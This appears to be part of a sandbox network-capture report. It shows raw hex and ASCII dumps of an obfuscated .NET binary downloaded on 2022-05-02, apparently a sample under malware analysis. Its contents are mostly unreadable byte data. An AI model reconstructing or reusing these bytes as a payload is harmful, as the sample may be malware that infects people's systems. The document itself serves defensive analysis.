                                                                                  2022-05-02 11:02:01 UTC735INData Raw: 00 0c 6f 00 10 01 01 06 ff 05 a9 00 75 00 00 0b 7e 00 00 0c 10 00 10 01 01 06 f5 05 a8 00 59 00 00 0b 7e 00 00 0b fa 00 10 00 01 06 ef 05 a7 00 71 00 00 0b 7e 00 00 0b 94 00 10 00 01 06 e6 05 a6 00 69 00 00 0b 7e 00 00 0b 67 00 10 01 01 06 e6 05 9d 00 61 00 00 07 50 00 00 0b 5e 00 00 01 01 06 e1 05 9b 00 5d 00 00 07 50 00 00 0b 51 00 10 01 09 06 dc 05 9b 00 65 00 00 00 00 00 00 0b 44 00 00 01 02 06 d7 05 9a 00 59 00 00 00 00 00 00 0b 36 00 10 01 82 06 cc 05 99 00 59 00 00 00 00 00 00 0b 2b 00 10 01 82 06 b0 05 97 00 59 00 00 07 50 00 00 0b 20 00 10 01 81 06 a3 05 92 00 59 00 00 07 50 00 00 0b 0b 00 00 01 01 06 64 05 83 00 59 00 00 07 50 00 00 0a ff 00 10 01 01 06 13 05 6d 00 59 00 00 07 50 00 00 0a f3 00 10 01 01 06 0d 05 6b 04 5c 00 00 07 50 00 00 0a d7
                                                                                  Data Ascii: ou~Y~q~i~gaP^]PQeDY6Y+YP YPdYPmYPk\P
                                                                                  2022-05-02 11:02:01 UTC751INData Raw: 05 2b 4e 00 2a 06 00 0c 29 28 02 00 05 66 d0 36 4d 29 4a 28 05 2b 4a 00 00 2a 06 00 1e 5a 6f 00 0e 01 0e 66 52 91 fb 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 05 65 d0 53 35 82 ad 28 05 2b 4a 00 00 2a 06 00 1e 56 6f 00 0e 01 0e 44 18 4c f3 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 05 64 d0 69 4b c2 a2 28 05 2b 4a 00 00 2a 06 00 1e 52 6f 04 0e 03 0e 02 0e 01 0e 00 0e 05 0e 2f 30 81 d0 28 05 2b 66 00 2a 06 00 0c 29 28 02 00 05 63 d0 4c 54 b6 17 28 05 2b 4a 00 00 2a 06 00 1e 4e 6f 00 0e 01 0e 3e 60 01 16 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 05 62 d0 30 65 0d 32 28 05 2b 4a 00 00 2a 06 00 1e 4a 6f 00 0e 01 0e 53 4f 65 dd 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 05 61 d0 64 71 9f 35 28 05 2b 4a 2a 06 00 1e 46 6f 01 0e 00 0e 02 0e 64 60 ef 55 28 05 2b 4e 00 2a 06 00
                                                                                  Data Ascii: +N*)(f6M)J(+J*ZofR(+F*)(eS5(+J*VoDL(+F*)(diK(+J*Ro/0(+f*)(cLT(+J*No>`(+F*)(b0e2(+J*JoSOe(+F*)(adq5(+J*Fod`U(+N*
                                                                                  2022-05-02 11:02:01 UTC767INData Raw: 03 e3 d0 5c 19 55 41 28 05 2b 4a 00 00 2a 06 00 18 4e 6f 02 0e 01 0e 00 0e 03 0e 40 2d 8d da 28 05 2b 56 00 2a 06 00 0c 29 28 02 00 03 e2 d0 42 6e b8 e4 28 05 2b 4a 00 00 2a 06 00 18 4a 6f 00 0e 01 0e 49 01 68 ed 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 e1 d0 66 1a 18 35 28 05 2b 4a 00 00 2a 06 00 18 46 6f 00 0e 01 0e 42 1e ce 91 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 e0 d0 4e 06 21 75 28 05 2b 4a 00 00 2a 06 00 18 42 6f 02 0e 01 0e 00 0e 03 0e 3c 58 d3 cd 28 05 2b 56 00 2a 06 00 0c 29 28 02 00 03 df d0 36 69 d9 6e 28 05 2b 4a 2a 06 00 18 3e 6f 01 0e 00 0e 02 0e 60 1a 2c 46 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 03 de d0 62 21 3c 84 28 05 2b 4a 00 00 2a 06 00 18 3a 6f 02 0e 01 0e 00 0e 03 0e 3a 1b 8b bd 28 05 2b 56 00 2a 06 00 0c 29 28 02 00 03 dd d0
                                                                                  Data Ascii: \UA(+J*No@-(+V*)(Bn(+J*JoIh(+F*)(f5(+J*FoB(+F*)(N!u(+J*Bo<X(+V*)(6in(+J*>o`,F(+N*)(b!<(+J*:o:(+V*)(
                                                                                  2022-05-02 11:02:01 UTC783INData Raw: 07 12 c3 28 05 2b 4a 00 00 2a 06 00 12 0a 6f 02 0e 01 0e 00 0e 03 0e 52 37 25 4a 28 05 2b 56 00 2a 06 00 0c 29 28 02 00 02 51 d0 49 49 ce 64 28 05 2b 4a 2a 06 00 12 06 6f 00 0e 58 0e 9e 54 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 02 50 d0 5d 23 13 ec 28 05 2b 4a 00 00 2a 06 00 12 02 6f 02 0e 01 0e 00 0e 03 0e 41 09 3e ff 28 05 2b 56 00 2a 06 00 0c 29 28 02 00 02 4f d0 4f 24 55 49 28 05 2b 4a 2a 06 00 11 fe 6f 03 0e 02 0e 01 0e 00 0e 04 0e 5f 18 8f c2 28 05 2b 5e 00 2a 06 00 0c 29 28 02 00 02 4e d0 6e 3f 94 61 28 05 2b 4a 00 00 2a 06 00 11 fa 6f 00 0e 01 0e 4e 52 32 7d 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 02 4d d0 5a 72 cb f6 28 05 2b 4a 2a 06 00 11 f6 6f 00 0e 67 1b 46 2c 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 02 4c d0 52 40 9a 0d 28 05 2b 4a 2a 06 00 11
                                                                                  Data Ascii: (+J*oR7%J(+V*)(QIId(+J*oXT(+>*)(P]#(+J*oA>(+V*)(OO$UI(+J*o_(+^*)(Nn?a(+J*oNR2}(+F*)(MZr(+J*ogF,(+>*)(LR@(+J*
                                                                                  2022-05-02 11:02:01 UTC799INData Raw: fc 50 38 ff ff fe 77 38 0a 00 02 e8 6f 9a 0f 11 09 11 0a 00 02 ea 7e 13 11 ff ff fa 67 38 a2 0a 00 02 46 6f 06 00 0f 7e 28 9a 0c 11 06 11 0c 11 07 11 ff ff fb af 38 ff ff f9 8d 38 ff ff f8 80 38 00 00 00 00 20 26 ff ff f8 8b 39 06 00 0f 6a 28 00 00 00 00 20 ff ff f9 b7 39 0a 00 01 dc 6f 0a 00 00 af 6f 02 ff ff fc 0b 38 0a 00 02 e8 6f 9a 0f 11 09 11 0a 00 03 37 7e 13 11 ff ff fc b0 38 ff ff fb 2a 39 0a 00 02 0c 28 0a 00 00 23 28 06 00 0c bf 28 01 00 00 16 20 9a 0e 11 07 11 ff ff fa cd 38 0a 00 00 19 6f 0a 00 02 dc 7e 13 11 00 00 00 7e 38 ff ff fe 61 39 0a 00 03 af 6f 06 00 0f 7e 28 9a 0c 11 06 11 ff ff ff 7e 38 a2 0a 00 00 39 6f 9a 0d 11 07 11 13 11 0d 11 09 11 ff ff f9 82 38 02 13 14 ff ff f9 e7 38 00 00 00 23 3f 69 8e 07 11 0c 11 ff ff fa 7b 38 03 13 01
                                                                                  Data Ascii: P8w8o~g8Fo~(888 &9j( 9oo8o7~8*9(#(( 8o~~8a9o~(~89o88#?i{8
                                                                                  2022-05-02 11:02:01 UTC815INData Raw: 07 37 ff ff e7 a2 ff ff e6 58 00 00 12 08 00 00 0e 4e 00 00 03 4c ff ff db d3 ff ff f2 90 ff ff e7 a2 00 00 12 59 ff ff e1 0b ff ff d1 6b 00 00 00 a6 ff ff eb d2 ff ff f2 e8 ff ff eb 53 00 00 03 ac ff ff d9 f2 00 00 07 ba ff ff ef f4 ff ff dd 32 ff ff db 5a ff ff d9 b9 00 00 0a ad 00 00 0e 4e ff ff e9 6f ff ff e5 a2 00 00 02 c8 ff ff f5 62 00 00 13 3f ff ff d8 1a ff ff ea 6f 00 00 17 68 00 00 03 d0 ff ff e7 a3 ff ff df 52 ff ff e7 a2 00 00 19 47 ff ff cc 5f 00 00 17 0d ff ff e5 e9 ff ff cd f4 00 00 09 e1 00 00 15 18 ff ff cf 88 ff ff de 89 00 00 12 72 00 00 0c 8f ff ff d0 6e ff ff f5 1f ff ff db 15 ff ff cd f4 ff ff f0 92 ff ff e8 4a ff ff d8 53 ff ff e7 a2 ff ff e2 cf 00 00 10 79 ff ff ea 52 00 00 12 fd 00 00 10 5c 00 00 05 dd ff ff d9 97 ff ff d7 d9 00
                                                                                  Data Ascii: 7XNLYkS2ZNob?ohRG_rnJSyR\
                                                                                  2022-05-02 11:02:01 UTC831INData Raw: 20 bb 28 04 00 0c 73 7e 02 00 00 00 7f 38 00 00 00 44 3a 0a 00 03 de 28 0a 12 ff ff ff b0 38 04 00 07 96 7d 04 00 07 7f 7b 04 00 07 79 7b 0b 11 02 00 00 00 5d 38 0c 13 0b 11 ff ff ff c2 38 00 00 00 00 20 26 ff ff ff cd 3a 06 00 0f 6a 28 00 00 00 00 20 00 00 00 ca 38 00 00 00 50 38 04 00 07 95 7d 04 00 07 96 7b 02 02 00 00 00 50 38 00 00 00 55 00 00 00 01 45 00 08 0c fe 00 00 00 b2 38 00 00 00 67 38 00 00 00 02 9b 38 52 17 03 00 00 01 22 38 00 00 03 05 00 00 01 77 00 00 01 27 00 00 00 03 45 00 05 0c fe 00 00 02 8b 38 03 13 00 00 03 87 dd 00 00 00 00 38 06 00 20 ab 28 04 00 0c 6f 7e 00 11 02 00 00 00 04 4d 38 04 00 07 9b 7d 16 02 00 00 00 00 38 00 00 04 5f 39 04 00 07 9b 7b 02 00 00 04 57 38 04 00 07 9a 7d 16 02 2a 00 00 04 36 38 00 00 03 c0 00 00 04 3b 00
                                                                                  Data Ascii: (s~8D:(8}{y{]88 &:j( 8P8}{P8UE8g88R"8w'E88 (o~M8}8_9{W8}*68;
                                                                                  2022-05-02 11:02:01 UTC847INData Raw: 01 95 74 03 04 00 07 4b 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 ff ff ff 35 38 00 00 00 5a 39 06 00 20 0f 28 04 00 0c 48 7e 03 ff ff ff 5a 38 ff ff ff ce 38 ff ff ff d9 38 00 00 00 0f 39 06 00 20 07 28 04 00 0c 46 7e 03 00 00 00 1f 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 7a 06 00 0e bf 73 2a 06 00 0d a0 73 6e 64 5f 1f 1f 04 00 07 41 7b 04 00 07 42 7c 06 00 0e 14 6f 02 00 01 98 74 03 04 00 07 40 7b 04 00 07 42 7c 06 00 0e 14 6f 02 2a 06 00 0d a2 73 64 5f 3f 1f 04 00 07 4a 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 01 98 74 03 04 00 07 4b 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 00 00 00 38 00 00 00 34 40 1e 0a 00 00 1b 28 00 00 00 bb 38 00 00 00 ea 40 1e 0a 00 00 1b 28 00 00 00 97 38 57 1c 60 de 28 05 2b 00 00 00 00 00 00 01 41 00 04 30 13 00 ff ff ff 64 38 01 10
                                                                                  Data Ascii: tK{M|o58Z9 (H~Z8889 (F~8 (G~zs*snd_A{B|ot@{B|o*sd_?J{M|otK{M|o84@(8@(8W`(+A0d8
                                                                                  2022-05-02 11:02:01 UTC863INData Raw: ff ff 9c 38 ff ff ff b3 39 06 00 20 07 28 04 00 0c 46 7e 03 7a 06 00 0e bf 73 2a 06 00 0d 3c 73 db 04 00 07 4b 7b 04 00 07 4d 7c 02 00 01 97 74 03 04 00 07 4b 7b 04 00 07 4d 7c 02 00 00 00 00 38 00 00 00 27 39 06 00 20 63 28 04 00 0c 5d 7e 03 00 00 00 00 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 00 00 00 4f 38 38 39 0c ef 28 05 2b 00 00 00 00 00 00 00 70 00 03 30 13 ff ff ff d9 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 ff ff ff ae 38 ff ff ff d5 39 06 00 20 63 28 04 00 0c 5d 7e 03 00 00 00 15 38 00 00 00 05 39 06 00 20 07 28 04 00 0c 46 7e 03 7a 06 00 0e bf 73 2a 06 00 0d 38 73 da 04 00 07 4c 7b 04 00 07 4d 7c 02 00 01 97 74 03 04 00 07 4c 7b 04 00 07 4d 7c 02 00 00 00 28 38 2e 36 99 c3 28 05 2b 00 00 00 00 00 00 00 70 00 03 30 13 ff ff ff 9c 38 ff ff ff
                                                                                  Data Ascii: 89 (F~zs*<sK{M|tK{M|8'9 c(]~8 (G~O889(+p08 (G~89 c(]~89 (F~zs*8sL{M|tL{M|(8.6(+p08
                                                                                  2022-05-02 11:02:01 UTC879INData Raw: 2a 13 04 00 07 73 7b 29 11 29 13 0a 00 03 c0 6f 28 11 04 00 07 85 7b 06 00 00 01 25 38 28 13 16 04 00 07 90 7d 02 00 01 b5 8d 0a 00 03 bf 6f 04 00 07 85 7b 06 07 ff ff ff 98 3f 69 8e 08 26 11 26 13 58 17 26 11 a2 06 00 1f e3 28 04 00 0c 3d 7e 9a 26 11 03 27 11 58 17 26 11 04 00 07 8f 7b 07 00 00 00 1b 38 04 13 58 17 04 11 a2 06 00 1f e3 28 04 00 0c 3d 7e 9a 26 11 03 27 11 58 17 26 11 04 00 07 8f 7b 07 00 00 00 26 39 0a 00 03 af 6f 27 11 27 13 0a 00 02 6f 6f 9a 26 11 08 00 00 00 5e 38 26 13 16 a2 06 00 0f a5 73 04 16 04 00 07 8f 7b 07 00 00 00 0e 38 a2 06 00 0f 0c 73 0a 00 00 af 6f 04 00 07 82 7b 06 06 00 0f a5 73 04 16 04 00 07 8f 7b 07 00 00 00 23 39 0a 00 01 dc 6f 0a 00 00 af 6f 04 00 07 82 7b 06 04 00 07 8f 7d 02 00 01 b5 8d 58 17 69 8e 08 07 00 00 00
                                                                                  Data Ascii: *s{))o({%8(}o{?i&&X&(=~&'X&{8X(=~&'X&{&9o''oo&^8&s{8so{s{#9oo{}Xi
                                                                                  2022-05-02 11:02:01 UTC895INData Raw: 42 16 04 02 10 59 06 04 06 00 0c 26 28 06 16 05 02 26 0a 00 00 83 6f 06 16 05 03 0a 69 8e 05 00 00 00 03 38 04 00 00 00 06 42 69 8e 05 04 00 00 00 2b 38 11 00 00 01 00 00 00 38 00 05 30 13 00 00 2a 06 00 0c 19 28 02 2a 0a 00 00 dc 28 02 0a 00 00 ed 73 00 00 00 0c 3a 06 00 0c 1f 28 76 01 00 00 16 06 00 27 0f 00 18 00 00 01 00 00 16 0c 00 0b 0b 00 00 00 00 00 00 1c 01 00 00 2a 00 00 00 00 dd 26 00 00 00 06 dd 04 00 07 1d 80 0a 00 03 83 28 00 00 00 00 16 dd 04 00 07 1d 80 17 26 00 00 00 0c dd 26 0a 00 00 ed 73 00 00 00 00 00 00 00 2e 00 02 30 1b 01 00 00 16 45 00 23 0b 00 18 00 00 01 00 00 16 20 00 43 1f 00 24 00 00 00 00 1c 01 00 00 2a 06 00 00 00 00 dd 00 00 00 00 dd 0a 01 00 00 91 74 0a 00 03 82 6f 0a 00 03 81 28 70 00 03 f6 72 70 00 04 62 72 26 00 00 00
                                                                                  Data Ascii: BY&(&oi8Bi+880*(*(s:(v'*&(&&s.0E# C$*to(prpbr&
                                                                                  2022-05-02 11:02:01 UTC911INData Raw: 02 e2 6f 00 02 09 fe 00 01 09 fe 00 00 09 fe 56 35 bd 80 28 05 2b 66 00 00 2a 0a 00 01 e4 6f 00 00 09 fe 5f 40 be 25 28 05 2b 46 00 2a 0a 00 02 6c 28 00 01 09 fe 00 00 09 fe 00 43 04 4f d2 28 05 2b 5a 00 2a 0a 00 00 c6 28 00 01 09 fe 00 00 09 fe 00 58 65 88 b0 28 05 2b 5a 00 00 2a 0a 00 03 76 6f 00 02 09 fe 00 01 09 fe 00 00 09 fe 6c 3e 52 20 28 05 2b 66 00 2a 0a 00 01 a0 28 00 01 09 fe 00 00 09 fe 00 59 57 1c 1e 28 05 2b 5a 00 2a 0a 00 00 8b 28 00 00 09 fe 00 5b 1c 1b 1b 28 05 2b 4a 00 2a 0a 00 00 23 28 00 00 09 fe 00 50 61 1c 6d 28 05 2b 4a 00 2a 06 00 0c bf 28 00 00 09 fe 00 47 08 f9 a7 28 05 2b 4a 00 00 2a 0a 00 00 4c 6f 00 00 09 fe 53 54 ae 20 28 05 2b 46 00 00 2a 0a 00 02 be 6f 00 01 09 fe 00 00 09 fe 6c 68 3a 36 28 05 2b 56 00 00 2a 04 00 06 f5 7e
                                                                                  Data Ascii: oV5(+f*o_@%(+F*l(CO(+Z*(Xe(+Z*vol>R (+f*(YW(+Z*([(+J*#(Pam(+J*(G(+J*LoST (+F*olh:6(+V*~
                                                                                  2022-05-02 11:02:01 UTC927INData Raw: a5 7e 01 11 01 11 00 00 00 5d 38 00 00 00 d9 00 00 00 62 00 00 00 02 45 00 00 0c fe 00 00 01 8e 38 00 00 01 16 3a 06 00 16 6f 28 04 00 09 e0 7e 05 11 00 00 00 00 00 38 02 13 06 00 0c 03 73 05 11 01 11 00 00 02 81 38 2f 59 1f 09 28 05 2b 11 00 01 9a 00 00 02 b5 00 06 30 1b 01 00 00 1b 63 00 b7 a7 00 10 00 00 00 00 10 01 00 00 00 ff ff fe de 38 00 13 06 00 17 4f 28 04 00 0a 18 7e 02 ff ff fe ed 38 7a 0a 00 02 9f 73 03 11 0a 00 00 c6 28 04 11 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 2f 7b 04 00 08 2c 7e 61 c6 f0 3c f9 20 c6 5e 98 31 20 ff ff ff d3 38 04 13 0a 00 02 0b 6f 00 11 00 00 00 0e 38 04 13 0a 00 01 a1 6f 00 11 00 00 00 00 38 00 00 00 21 39 0a 00 00 8b 28 04 11 00 00 00 1f 38 03 13 ff ff ff 55 dd 00 00 00 00 38 02 13 02 00 01 7b 74 06 00 0b e8 28 0a
                                                                                  Data Ascii: ~]8bE8:o(~8s8/Y(+0c8O(~8zs((&~a/{,~a< ^1 8o8o8!9(8U8{t(
                                                                                  2022-05-02 11:02:01 UTC943INData Raw: 00 01 86 38 35 53 58 6a 28 05 2b 11 00 01 88 00 00 07 46 00 0a 30 13 00 00 ff ff ff 37 38 00 13 02 ff ff ff 0d 38 ff ff fe d9 39 0a 00 02 9b 28 14 06 00 18 8b 28 04 00 0a 67 7e 17 04 00 05 18 7e 02 ff ff ff 70 38 ff ff ff 33 39 0a 00 01 de 6f 02 2a 0a 00 02 4b 28 16 03 ff ff ff b7 38 ff ff fe a2 39 0a 00 02 66 6f 02 ff ff fe 33 38 00 00 00 00 20 26 ff ff fe 3e 39 04 00 08 28 7b 04 00 08 2c 7e 00 00 00 00 20 ff ff ff 3c 3a 04 11 ff ff fe df 38 ff ff fe d8 39 01 13 25 0a 00 02 0b 6f 02 ff ff fe b2 38 ff ff fe eb 39 0a 00 01 a0 28 0a 00 00 23 28 06 00 0c bf 28 01 00 00 dc 20 02 00 00 00 80 38 ff ff ff b3 3a 0a 00 02 8f 6f 02 00 00 00 78 38 00 00 00 85 39 0a 00 02 6e 6f 02 ff ff fe ab 38 00 00 00 01 20 26 ff ff fe b6 39 04 00 07 d2 7b 04 00 08 2c 7e 00 00 00
                                                                                  Data Ascii: 85SXj(+F07889((g~~p839o*K(89fo38 &>9({,~ <:89%o89(#(( 8:ox89no8 &9{,~
                                                                                  2022-05-02 11:02:01 UTC959INData Raw: 16 20 04 0e 06 0e 05 0e 04 0e 05 16 17 0a 00 00 37 6f 01 11 00 00 00 98 38 06 00 16 8f 28 04 00 09 e8 7e 06 00 1d 83 28 04 00 0b a5 7e 02 11 02 11 00 00 01 73 38 04 13 04 00 00 01 ab 38 06 00 18 a3 28 04 00 0a 6d 7e 04 11 02 11 00 00 00 9a 38 06 00 1d 77 28 04 00 0b a2 7e 02 11 00 00 01 03 38 00 00 01 08 00 00 00 01 45 00 06 0c fe 00 00 01 06 38 53 60 f2 b2 28 05 2b 11 00 01 70 00 00 02 d4 00 0c 30 1b 01 00 00 16 0b 00 95 26 00 6f 00 00 01 00 00 16 0b 01 58 5b 00 fd 00 00 00 00 1c 01 00 00 ff ff fe b7 38 0e 13 0a 00 00 2f 73 a2 0d 11 16 25 01 00 00 16 8d 17 0a 00 02 d5 6f a2 06 00 1d 27 28 04 00 0b 8e 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 07 20 02 16 25 01 00 00 2f 8d 17 00 11 ff ff fd 9c 38 03 13 a2 06 00 1d 93 28 04 00 0b a9 7e 03 16 25 01 00 00 16
                                                                                  Data Ascii: 7o8(~(~s88(m~8w(~8E8S`(+p0&oX[8/s%o'(~#(( %/8(~%
                                                                                  2022-05-02 11:02:01 UTC975INData Raw: 38 26 0a 00 02 ba 6f 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e5 7b 04 00 08 2c 7e 61 f8 80 9b d8 20 58 18 b1 e5 74 20 c1 d1 30 53 20 03 11 00 00 01 6c 38 dc ff ff ff e8 38 00 00 00 05 39 16 11 00 00 00 0c 38 0a 00 00 4c 6f 16 11 00 00 00 0c 38 16 13 01 00 00 46 75 0f 11 00 00 01 98 dd ff ff ff 48 38 ff ff ff 96 3a 0a 00 00 8b 28 11 11 ff ff ff 11 38 00 00 00 00 20 26 ff ff ff 1c 3a 04 00 08 01 7b 04 00 08 2c 7e 00 00 00 00 20 10 13 02 00 01 5c 74 0a 00 00 56 6f 0f 11 ff ff ff b7 38 ff ff ff d4 3a 06 00 1c ab 28 04 00 0b 6f 7e 10 11 ff ff ff 6e 38 ff ff ff ea 38 00 00 00 5e 38 00 00 00 25 3a 06 00 0a 7c 28 0f 11 00 00 00 5e 38 11 13 0a 00 02 64 6f 06 00 1a 67 28 04 00 0a de 7e 10 11 ff ff ff 95 38 00 00 00 1d 3a 0a 00 02 61 6f 06 00 13 87 28 04 00 09 26
                                                                                  Data Ascii: 8&o(&~a{,~a Xt 0S l8898Lo8FuH8:(8 &:{,~ \tVo8:(o~n88^8%:|(^8dog(~8:ao(&
                                                                                  2022-05-02 11:02:01 UTC991INData Raw: 3b 7e 04 08 11 ff ff fe 39 38 ff ff fd 58 39 06 00 1c 07 28 04 00 0b 46 7e 08 11 ff ff ff 95 38 ff ff fd 6e 39 08 11 ff ff f9 86 38 03 13 14 ff ff fe 35 38 07 13 01 00 00 5a 8c 6a 16 ff ff fd 8b 38 06 00 1c 0f 28 04 00 0b 48 7e 02 00 00 f6 a5 13 11 08 11 ff ff fd de 38 07 13 01 00 00 c1 8c 0a 00 02 8e 7e ff ff f9 37 38 00 06 0e fe 00 00 00 05 20 06 00 1b c3 28 04 00 0b 35 7e 04 00 05 5c 7b 04 08 11 ff ff ff 61 38 07 13 01 00 00 99 8c 16 00 00 00 aa 38 ff ff fe 46 39 0a 00 01 a0 28 06 00 16 13 28 04 00 09 c9 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 04 20 04 00 06 5b 7b 02 0a 00 02 50 6f 0f 11 ff ff ff b7 38 00 00 01 00 3a 14 13 25 06 00 1b 77 28 04 00 0b 22 7e 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 fa 7b 04 00 08 2c 7e 61 2e 7c 89 89 20 62 00 00 00 02
                                                                                  Data Ascii: ;~98X9(F~8n9858Zj8(H~8~78 (5~\{a88F9((~#(( [{Po8:%w("~(&~a{,~a.| b
                                                                                  2022-05-02 11:02:01 UTC1007INData Raw: 28 04 00 0a e1 7e 06 00 1a 87 28 04 00 0a e6 7e 17 03 02 00 11 ff ff ff ca 38 06 00 1a 7f 28 04 00 0a e4 7e 06 00 1a 87 28 04 00 0a e6 7e 17 04 0e 02 00 11 ff ff ff d1 38 ff ff ff dc 39 06 00 1a 83 28 04 00 0a e5 7e 02 2a 02 00 00 00 36 38 00 13 06 00 1a 6f 28 04 00 0a e0 7e 02 7a 0a 00 02 0e 73 00 00 00 1a 38 5f 20 3a b5 28 05 2b 11 00 01 3e 00 00 00 b4 00 06 30 13 00 00 00 ff ff ff b7 38 06 00 1a 7b 28 04 00 0a e3 7e 05 00 11 ff ff ff b7 38 00 13 06 00 1a 6f 28 04 00 0a e0 7e 02 00 00 00 12 38 06 00 1a 77 28 04 00 0a e2 7e 04 00 11 ff ff ff d9 38 06 00 1a 7f 28 04 00 0a e4 7e 04 0e 00 11 00 00 00 13 38 06 00 1a 73 28 04 00 0a e1 7e 03 00 11 2a 02 00 00 00 39 38 4b 4f 5c f0 28 05 2b 11 00 01 3e 00 00 00 69 00 04 30 13 2a 0a 00 01 dc 6f 04 00 06 5c 7b 02
                                                                                  Data Ascii: (~(~8(~(~89(~*68o(~zs8_ :(+>08{(~8o(~8w(~8(~8s(~*98KO\(+>i0*o\{
                                                                                  2022-05-02 11:02:01 UTC1023INData Raw: 05 11 03 04 00 00 02 a3 38 00 00 01 ec 39 0a 00 01 a0 28 04 00 06 2a 7b 02 06 11 00 00 00 62 38 00 00 02 74 3d 16 00 13 25 06 00 13 b7 28 04 00 09 32 7e 04 00 00 02 fb 38 01 10 06 00 16 d3 28 04 00 09 f9 7e 04 03 05 11 00 00 01 f4 38 05 13 9a 04 11 04 00 06 2c 7b 02 00 00 02 ad 38 00 00 01 98 00 00 00 f2 00 00 01 d5 00 00 01 6b 00 00 02 b2 00 00 00 05 45 00 02 0c fe 00 00 02 39 38 56 54 03 a6 28 05 2b 11 00 01 2c 00 00 03 68 00 06 30 13 2a ff ff ff 15 38 01 13 58 17 01 11 ff ff ff cb 38 06 00 16 c7 28 04 00 09 f6 7e 04 03 03 11 ff ff fe cf 38 00 00 00 00 20 26 ff ff fe da 3a 04 00 08 2e 7b 04 00 08 2c 7e 00 00 00 00 20 01 13 16 00 00 00 40 38 06 00 19 a7 28 04 00 0a ae 7e 06 00 19 a3 28 04 00 0a ad 7e 04 17 03 02 ff ff ff 3f 38 06 00 19 ab 28 04 00 0a af
                                                                                  Data Ascii: 89(*{b8t=%(2~8(~8,{8kE98VT(+,h0*8X8(~8 &:.{,~ @8(~(~?8(
                                                                                  2022-05-02 11:02:01 UTC1039INData Raw: 38 00 00 00 3b 38 01 13 06 00 16 d3 28 04 00 09 f9 7e 04 00 11 04 00 06 0a 7b 02 ff ff ff b4 38 00 00 00 00 20 26 ff ff ff bf 3a 04 00 07 e3 7b 04 00 08 2c 7e 00 00 00 00 20 00 00 00 43 39 0a 00 01 e2 28 14 04 00 06 08 7b 02 00 00 00 00 38 ff ff ff f7 39 01 11 2a 14 00 00 00 7f 38 00 00 00 84 00 00 00 01 45 00 02 0c fe 00 00 00 c0 38 40 22 ba fd 28 05 2b 11 00 01 1c 00 00 00 fa 00 07 30 13 00 2a ff ff ff ca 38 01 10 0a 00 02 6b 6f 14 03 04 00 06 05 7b 02 00 00 00 14 38 06 00 16 c7 28 04 00 09 f6 7e 04 03 04 00 06 0a 7b 02 00 00 00 00 38 00 00 00 30 39 03 00 00 00 22 38 64 05 b0 27 28 05 2b 00 00 00 00 00 00 00 43 00 05 30 03 ff ff ff a8 38 ff ff ff 49 38 ff ff ff 53 38 00 13 0a 00 02 87 6f 03 00 00 00 0d 38 ff ff ff c4 3a 0a 00 02 86 6f 01 11 ff ff ff 6c
                                                                                  Data Ascii: 8;8(~{8 &:{,~ C9({89*8E8@"(+0*8ko{8(~{809"8d'(+C08I8S8o8:ol
                                                                                  2022-05-02 11:02:01 UTC1055INData Raw: 38 03 13 0a 00 02 50 6f 02 11 ff ff fe 57 38 51 06 00 18 4f 28 04 00 0a 58 7e 16 16 06 00 18 37 28 04 00 0a 52 7e 16 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 10 7b 04 00 08 2c 7e 61 bd 21 14 e6 20 ee 42 84 60 20 01 11 04 0e ff ff fc dd 38 51 06 00 18 3b 28 04 00 0a 53 7e 14 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e7 7b 04 00 08 2c 7e 61 ad fa e7 ea 20 d4 c8 c5 bc 20 01 11 05 ff ff fc f6 38 51 06 00 18 4f 28 04 00 0a 58 7e 16 16 06 00 18 37 28 04 00 0a 52 7e 16 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 2e 7b 04 00 08 2c 7e 61 b1 d4 91 9d 20 58 18 b1 e5 74 20 c1 d1 30 53 20 01 11 04 0e ff ff fe 56 38 02 13 06 00 18 9b 28 04 00 0a 6b 7e 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e8 7b 04 00 08 2c 7e 61 df 86 06 ba 20 fe 09 0c a4 20 07 11 ff ff fd 73 38 ff
                                                                                  Data Ascii: 8PoW8QO(X~7(R~(&~a{,~a! B` 8Q;(S~(&~a{,~a 8QO(X~7(R~(&~a.{,~a Xt 0S V8(k~(&~a{,~a s8
                                                                                  2022-05-02 11:02:01 UTC1071INData Raw: 00 08 2c 7e 00 00 00 00 20 02 13 06 00 16 9b 28 04 00 09 eb 7e 03 00 ff ff ff df 38 ff ff ff b3 3a 04 00 05 cf 7b 02 ff ff ff dc 38 06 00 16 8f 28 04 00 09 e8 7e 04 03 00 00 02 7b 38 06 00 17 e3 28 04 00 0a 3d 7e 16 00 11 03 00 00 00 34 38 01 13 06 00 16 73 28 04 00 09 e1 7e 04 06 00 17 d3 28 04 00 0a 39 7e 02 03 2a 2a 00 00 02 e0 38 4c 2b 3e d1 28 05 2b 11 00 00 fb 00 00 02 fe 00 05 30 1b 00 00 00 ff ff ff 23 38 00 00 00 00 20 26 ff ff ff 2e 3a 04 00 07 ed 7b 04 00 08 2c 7e 00 00 00 00 20 01 13 16 2a 2a ff ff ff 80 38 01 13 58 17 01 11 2a ff ff ff bc 38 00 00 00 06 39 0a 00 02 4f 28 03 04 00 05 d2 7b 02 00 01 33 8f 01 11 04 00 05 cf 7b 02 00 00 00 22 38 06 00 13 9b 28 04 00 09 2b 7e 04 04 00 05 d3 7b 02 00 01 33 8f 01 11 04 00 05 cf 7b 02 00 00 00 51 38
